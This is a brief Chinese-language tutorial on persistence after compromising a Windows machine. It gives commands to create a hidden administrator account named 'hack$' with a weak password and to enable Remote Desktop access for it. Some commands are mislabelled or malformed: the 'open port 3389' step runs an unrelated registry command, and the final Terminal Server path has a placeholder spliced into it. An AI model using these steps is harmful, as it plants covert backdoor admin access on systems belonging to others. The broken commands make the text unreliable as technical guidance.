拿到Windows的shell后设置隐藏用户

1. 拿到windows的管理员shell

1. 打开Windows的远程登录端口3389

REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon\SpecialAccounts\UserList" /v 123 /T REG_DWORD /D 1

1. 添加一个隐藏用户（用$便会隐藏）

net user hack$ 123456 /add

1. 给用户设置进管理员组

net localgroup administrators hack$ /add

1. 查看

没有发现hack$用户

但是在家庭其他用户还是能看见

1. 允许你添加的用户进行远程连接

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal"此处填写用户名"Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f